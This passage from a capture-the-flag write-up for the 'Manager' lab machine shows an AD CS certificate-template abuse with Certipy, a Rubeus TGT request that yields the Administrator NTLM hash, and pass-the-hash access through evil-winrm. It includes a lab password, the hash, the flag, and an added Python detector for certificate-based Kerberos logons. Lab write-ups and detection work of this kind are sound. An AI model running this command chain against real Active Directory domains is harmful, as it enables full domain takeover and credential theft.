Certipy v4.8.0 - by Oliver Lyak (ly4k)

[*] Successfully added officer 'Raven' on 'manager-DC01-CA'
```

We can then follow the next example command in much the same way. This enables the SubCA template. We then continue along with the provided examples and request a certificate, saving the private key when prompted.

```sh
┌──(kali㉿kali)-[~/tools]
└─$ certipy ca -ca 'manager-DC01-CA' -enable-template 'SubCA' -username raven@manger.htb -password 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.10.11.236
Certipy v4.8.0 - by Oliver Lyak (ly4k)
[*] Successfully enabled 'SubCA' on 'manager-DC01-CA'

┌──(kali㉿kali)-[~/tools]
└─$ certipy req -ca 'manager-DC01-CA' -template SubCA -upn administrator@manager.htb -username raven@manger.htb -password 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.10.11.236 -target dc01.manager.htb
Certipy v4.8.0 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[-] Got error while trying to request certificate: code: 0x80094012 - CERTSRV_E_TEMPLATE_DENIED - The permissions on the certificate template do not allow the current user to enroll for this type of certificate.
[*] Request ID is 13
Would you like to save the private key? (y/N) y
[*] Saved private key to 13.key
[-] Failed to request certificate

┌──(kali㉿kali)-[~/tools]
└─$ ls -la 13.key
-rw-r--r-- 1 kali kali 1700 Oct 23 19:50 13.key
```

As mentioned in the guides, this command will say it fails; this is okay. We then continue by issuing the failed request.

```sh
┌──(kali㉿kali)-[~/Desktop]
└─$ certipy ca -ca 'manager-DC01-CA' -issue-request 13 -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.10.11.236
Certipy v4.8.0 - by Oliver Lyak (ly4k)

[*] Successfully issued certificate
```

The next step is to retrieve the issued certificate.

```sh
┌──(kali㉿kali)-[~/Desktop]
└─$ certipy req -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' -ca 'manager-DC01-CA' -target dc.manager.htb -retrieve 33 -dc-ip 10.10.11.236

Certipy v4.8.0 - by Oliver Lyak (ly4k)

/home/kali/.local/lib/python3.11/site-packages/requests/__init__.py:102: RequestsDependencyWarning: urllib3 (1.26.16) or chardet (5.2.0)/charset_normalizer (2.0.12) doesn't match a supported version!
  warnings.warn("urllib3 ({}) or chardet ({})/charset_normalizer ({}) doesn't match a supported "
[*] Rerieving certificate with ID 13
[*] Successfully retrieved certificate
[*] Got certificate with UPN 'administrator@manager.htb'
[*] Certificate has no object SID
[*] Loaded private key from '13.key'
[*] Saved certificate and private key to 'administrator.pfx'
```

If you're anything like me, however, you will keep getting errors when attempting to issue the failed request. To solve this I simply chained all the commands into one bash command line so that they run one right after the other. Make sure to change the request ID values with each attempt.

```sh
sudo ntpdate -u 10.10.11.236; certipy ca -ca 'manager-DC01-CA' -add-officer raven -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.10.11.236;certipy ca -ca 'manager-DC01-CA' -enable-template SubCA -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.10.11.236;certipy req -ca 'manager-DC01-CA'  -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.10.11.236 -target 10.10.11.236 -template SubCA -upn administrator@manager.htb;certipy ca -ca 'manager-DC01-CA' -issue-request 32 -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.10.11.236;certipy req -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' -ca 'manager-DC01-CA' -target 10.10.11.236 -retrieve 32 -dc-ip 10.10.11.236
```

When you get it working correctly you will end up with an administrator.pfx file.

```sh
┌──(kali㉿kali)-[~/Desktop]
└─$ ls -la
<...>
-rw-r--r--  1 kali kali    2881 Oct 23 21:00  administrator.pfx
```

One of the best memes

Rubeus for TGT using PFX file

To abuse the administrator.pfx file we upload it, along with a copy of the Rubeus .exe binary, to the host and use Rubeus to request a TGT with the certificate, from which we can also extract the administrator user's NTLM hash.

```powershell
*Evil-WinRM* PS C:\Users\Raven\Documents> upload Rubeus.exe
Info: Uploading /home/kali/tools/Rubeus.exe to C:\Users\Raven\Documents\Rubeus.exe
Data: 595968 bytes of 595968 bytes copied
Info: Upload successful!

*Evil-WinRM* PS C:\Users\Raven\Documents> upload administrator.pfx
Info: Uploading /home/kali/tools/administrator.pfx to C:\Users\Raven\Documents\administrator.pfx
Data: 3840 bytes of 3840 bytes copied
Info: Upload successful!

*Evil-WinRM* PS C:\Users\Raven\Documents> ./Rubeus.exe asktgt /user:administrator /certificate:C:\Users\Raven\Documents\administrator.pfx /getcredentials /show /nowrap
   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.2.0

[*] Action: Ask TGT
<...>
NTLM              : AE5064C2F62317332C88629E025924EF
```
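The Rubeus step above is a certificate (PKINIT) logon for the Administrator account, and that is what makes it detectable: the DC's Security event 4768 (a Kerberos TGT was requested) carries the issuing CA, serial number and thumbprint in its certificate fields whenever the client authenticated with a certificate, and leaves them empty for a password logon. The following is an added example, not code from this writeup; the records are constructed to mimic those 4768 fields, and the watch-list of accounts and the expected source hosts are assumptions you would fill in for your own domain.

```python
"""Flag certificate-based TGT requests for privileged accounts.

Added example, not part of the original writeup. Windows Security event
4768 includes Certificate Issuer Name / Serial Number / Thumbprint fields
that are only populated when the TGT was obtained with a certificate
(PKINIT). A certificate logon for a Domain Admin from a host where that
never normally happens is the signal this script raises.
"""

WATCHED_ACCOUNTS = {"administrator"}   # assumption: accounts whose TGTs you care about
EXPECTED_SOURCES = {"10.10.11.10"}     # assumption: hosts where cert logon for them is normal

# Constructed sample records mimicking 4768 fields; not real telemetry.
SAMPLE_4768 = [
    # Password logon by an ordinary user: certificate fields empty, ignored.
    {"time": "2023-10-24T09:01:12", "account": "raven", "source_ip": "10.10.11.50",
     "cert_issuer": "", "cert_serial": "", "cert_thumbprint": ""},
    # Certificate logon for Administrator from the expected admin host: allowed.
    {"time": "2023-10-24T09:02:40", "account": "Administrator", "source_ip": "10.10.11.10",
     "cert_issuer": "manager-DC01-CA", "cert_serial": "SERIAL-PLACEHOLDER-1",
     "cert_thumbprint": "THUMBPRINT-PLACEHOLDER-1"},
    # Certificate logon for Administrator originating on the DC itself, the
    # shape a Rubeus asktgt run from a low-privileged WinRM shell on DC01 takes.
    {"time": "2023-10-24T09:05:03", "account": "Administrator", "source_ip": "10.10.11.236",
     "cert_issuer": "manager-DC01-CA", "cert_serial": "SERIAL-PLACEHOLDER-2",
     "cert_thumbprint": "THUMBPRINT-PLACEHOLDER-2"},
]


def is_certificate_logon(ev: dict) -> bool:
    """True when any of the 4768 certificate fields is populated."""
    return any(ev.get(key) for key in ("cert_issuer", "cert_serial", "cert_thumbprint"))


def flag_cert_tgts(events, watched=WATCHED_ACCOUNTS, expected=EXPECTED_SOURCES):
    """Return the certificate logons for watched accounts from unexpected sources."""
    hits = []
    for ev in events:
        if not is_certificate_logon(ev):
            continue                                   # ordinary password logon
        if ev["account"].lower() not in watched:
            continue                                   # not a privileged account
        if ev["source_ip"] in expected:
            continue                                   # known-good admin host
        hits.append({"time": ev["time"], "account": ev["account"],
                     "source_ip": ev["source_ip"], "issuer": ev["cert_issuer"],
                     "serial": ev["cert_serial"]})
    return hits


if __name__ == "__main__":
    for hit in flag_cert_tgts(SAMPLE_4768):
        print(f"{hit['time']} certificate TGT for {hit['account']} from "
              f"{hit['source_ip']} (issuer {hit['issuer']}, serial {hit['serial']})")
```

The serial number in the hit is the pivot for the follow-up: it identifies the exact request in the CA's issued-certificate database, which shows who requested it and on which template, and it is the value to revoke once the certificate is confirmed to be illegitimate.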

We can then pass this NTLM hash through Evil-winrm to get a shell as administrator. Lastly we grab root.txt from the administrator's desktop and complete the box!

```sh
┌──(kali㉿kali)-[~/tools]
└─$ evil-winrm -i 10.10.11.236 -u administrator -H AE5064C2F62317332C88629E025924EF
<...>
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
29b134a2de37b98d9fcc85cd83f934b3
```

Another box down, a ton to go!

Additional Resources

Ippsec video walkthrough

youtube.com

0xdf writeup

0xdf.gitlab.io